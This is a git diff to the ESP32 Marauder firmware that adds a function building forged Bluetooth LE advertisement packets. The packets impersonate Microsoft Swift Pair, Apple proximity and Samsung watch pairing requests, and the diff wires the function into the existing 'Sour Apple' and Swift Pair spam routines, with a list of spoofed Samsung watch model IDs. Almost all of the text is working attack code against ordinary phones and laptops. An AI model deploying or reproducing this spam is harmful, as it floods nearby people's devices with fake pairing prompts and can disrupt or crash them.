diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp index abbb234..8e9082b 100644 --- a/esp32_marauder/WiFiScan.cpp +++ b/esp32_marauder/WiFiScan.cpp @@ -27,6 +27,99 @@ extern "C" { //Exploit by ECTO-1A NimBLEAdvertising *pAdvertising; + //// Spooky + NimBLEAdvertisementData WiFiScan::GetUniversalAdvertisementData(EBLEPayloadType Type) { + NimBLEAdvertisementData AdvData = NimBLEAdvertisementData(); + + uint8_t* AdvData_Raw = nullptr; + uint8_t i = 0; + + switch (Type) { + case Microsoft: { + + const char* Name = this->generateRandomName(); + + uint8_t name_len = strlen(Name); + + AdvData_Raw = new uint8_t[7 + name_len]; + + AdvData_Raw[i++] = 7 + name_len - 1; + AdvData_Raw[i++] = 0xFF; + AdvData_Raw[i++] = 0x06; + AdvData_Raw[i++] = 0x00; + AdvData_Raw[i++] = 0x03; + AdvData_Raw[i++] = 0x00; + AdvData_Raw[i++] = 0x80; + memcpy(&AdvData_Raw[i], Name, name_len); + i += name_len; + + AdvData.addData(std::string((char *)AdvData_Raw, 7 + name_len)); + break; + } + case Apple: { + AdvData_Raw = new uint8_t[17]; + + AdvData_Raw[i++] = 17 - 1; // Packet Length + AdvData_Raw[i++] = 0xFF; // Packet Type (Manufacturer Specific) + AdvData_Raw[i++] = 0x4C; // Packet Company ID (Apple, Inc.) + AdvData_Raw[i++] = 0x00; // ... + AdvData_Raw[i++] = 0x0F; // Type + AdvData_Raw[i++] = 0x05; // Length + AdvData_Raw[i++] = 0xC1; // Action Flags + const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 }; + AdvData_Raw[i++] = types[rand() % sizeof(types)]; // Action Type + esp_fill_random(&AdvData_Raw[i], 3); // Authentication Tag + i += 3; + AdvData_Raw[i++] = 0x00; // ??? + AdvData_Raw[i++] = 0x00; // ??? + AdvData_Raw[i++] = 0x10; // Type ??? + esp_fill_random(&AdvData_Raw[i], 3); + + AdvData.addData(std::string((char *)AdvData_Raw, 17)); + break; + } + case Samsung: { + + AdvData_Raw = new uint8_t[14]; + + uint8_t model = watch_models[rand() % 25].value; + + AdvData_Raw[i++] = 14; // Size + AdvData_Raw[i++] = 0xFF; // AD Type (Manufacturer Specific) + AdvData_Raw[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.) + AdvData_Raw[i++] = 0x00; // ... + AdvData_Raw[i++] = 0x01; + AdvData_Raw[i++] = 0x00; + AdvData_Raw[i++] = 0x02; + AdvData_Raw[i++] = 0x00; + AdvData_Raw[i++] = 0x01; + AdvData_Raw[i++] = 0x01; + AdvData_Raw[i++] = 0xFF; + AdvData_Raw[i++] = 0x00; + AdvData_Raw[i++] = 0x00; + AdvData_Raw[i++] = 0x43; + AdvData_Raw[i++] = (model >> 0x00) & 0xFF; // Watch Model / Color (?) + + AdvData.addData(std::string((char *)AdvData_Raw, 14)); + break; + } + case Google: { + // TODO Google + break; + } + default: { + Serial.println("Please Provide a Company Type"); + break; + } + } + + delete[] AdvData_Raw; + + return AdvData; + } + //// Spooky + + // Apple NimBLEAdvertisementData getOAdvertisementData() { NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData(); uint8_t packet[17]; @@ -53,6 +146,7 @@ extern "C" { return randomAdvertisementData; } + // Microsoft NimBLEAdvertisementData getSwiftAdvertisementData() { extern WiFiScan wifi_scan_obj; NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData(); @@ -260,6 +354,35 @@ void WiFiScan::RunSetup() { access_points = new LinkedList(); stations = new LinkedList(); + watch_models = new WatchModel[26] { + {0x1A, "Fallback Watch"}, + {0x01, "White Watch4 Classic 44m"}, + {0x02, "Black Watch4 Classic 40m"}, + {0x03, "White Watch4 Classic 40m"}, + {0x04, "Black Watch4 44mm"}, + {0x05, "Silver Watch4 44mm"}, + {0x06, "Green Watch4 44mm"}, + {0x07, "Black Watch4 40mm"}, + {0x08, "White Watch4 40mm"}, + {0x09, "Gold Watch4 40mm"}, + {0x0A, "French Watch4"}, + {0x0B, "French Watch4 Classic"}, + {0x0C, "Fox Watch5 44mm"}, + {0x11, "Black Watch5 44mm"}, + {0x12, "Sapphire Watch5 44mm"}, + {0x13, "Purpleish Watch5 40mm"}, + {0x14, "Gold Watch5 40mm"}, + {0x15, "Black Watch5 Pro 45mm"}, + {0x16, "Gray Watch5 Pro 45mm"}, + {0x17, "White Watch5 44mm"}, + {0x18, "White & Black Watch5"}, + {0x1B, "Black Watch6 Pink 40mm"}, + {0x1C, "Gold Watch6 Gold 40mm"}, + {0x1D, "Silver Watch6 Cyan 44mm"}, + {0x1E, "Black Watch6 Classic 43m"}, + {0x20, "Green Watch6 Classic 43m"}, + }; + #ifdef HAS_BT NimBLEDevice::setScanFilterMode(CONFIG_BTDM_SCAN_DUPL_TYPE_DEVICE); NimBLEDevice::setScanDuplicateCacheSize(200); @@ -1466,7 +1589,8 @@ void WiFiScan::executeSourApple() { pAdvertising = pServer->getAdvertising(); delay(40); - NimBLEAdvertisementData advertisementData = getOAdvertisementData(); + //NimBLEAdvertisementData advertisementData = getOAdvertisementData(); + NimBLEAdvertisementData advertisementData = this->GetUniversalAdvertisementData(Apple); pAdvertising->setAdvertisementData(advertisementData); pAdvertising->start(); delay(20); @@ -1508,7 +1632,8 @@ void WiFiScan::executeSwiftpairSpam() { pAdvertising = pServer->getAdvertising(); - NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData(); + //NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData(); + NimBLEAdvertisementData advertisementData = this->GetUniversalAdvertisementData(Microsoft); pAdvertising->setAdvertisementData(advertisementData); pAdvertising->start(); delay(10); diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h index a1dce57..3a9ead3 100644 --- a/esp32_marauder/WiFiScan.h +++ b/esp32_marauder/WiFiScan.h @@ -4,6 +4,7 @@ #include "configs.h" #include +#include #ifdef HAS_BT #include @@ -298,7 +299,30 @@ class WiFiScan void RunEvilPortal(uint8_t scan_mode, uint16_t color); bool checkMem(); #ifdef HAS_BT + enum EBLEPayloadType + { + Microsoft, + Apple, + Samsung, + Google + }; + + struct BLEData + { + NimBLEAdvertisementData AdvData; + NimBLEAdvertisementData ScanData; + }; + + struct WatchModel + { + uint8_t value; + const char *name; + }; + + WatchModel* watch_models = nullptr; + static void scanCompleteCB(BLEScanResults scanResults); + NimBLEAdvertisementData GetUniversalAdvertisementData(EBLEPayloadType type); #endif @@ -373,5 +397,58 @@ class WiFiScan static void eapolSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type); static void wifiSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type); static void addPacket(wifi_promiscuous_pkt_t *snifferPacket, int len); + + /*#ifdef HAS_BT + enum EBLEPayloadType + { + Microsoft, + Apple, + Samsung, + Google + }; + + struct BLEData + { + NimBLEAdvertisementData AdvData; + NimBLEAdvertisementData ScanData; + }; + + struct WatchModel + { + uint8_t value; + const char *name; + }; + + WatchModel* watch_models = nullptr; + + const WatchModel watch_models[] = { + {0x1A, "Fallback Watch"}, + {0x01, "White Watch4 Classic 44m"}, + {0x02, "Black Watch4 Classic 40m"}, + {0x03, "White Watch4 Classic 40m"}, + {0x04, "Black Watch4 44mm"}, + {0x05, "Silver Watch4 44mm"}, + {0x06, "Green Watch4 44mm"}, + {0x07, "Black Watch4 40mm"}, + {0x08, "White Watch4 40mm"}, + {0x09, "Gold Watch4 40mm"}, + {0x0A, "French Watch4"}, + {0x0B, "French Watch4 Classic"}, + {0x0C, "Fox Watch5 44mm"}, + {0x11, "Black Watch5 44mm"}, + {0x12, "Sapphire Watch5 44mm"}, + {0x13, "Purpleish Watch5 40mm"}, + {0x14, "Gold Watch5 40mm"}, + {0x15, "Black Watch5 Pro 45mm"}, + {0x16, "Gray Watch5 Pro 45mm"}, + {0x17, "White Watch5 44mm"}, + {0x18, "White & Black Watch5"}, + {0x1B, "Black Watch6 Pink 40mm"}, + {0x1C, "Gold Watch6 Gold 40mm"}, + {0x1D, "Silver Watch6 Cyan 44mm"}, + {0x1E, "Black Watch6 Classic 43m"}, + {0x20, "Green Watch6 Classic 43m"}, + }; + #endif*/ }; #endif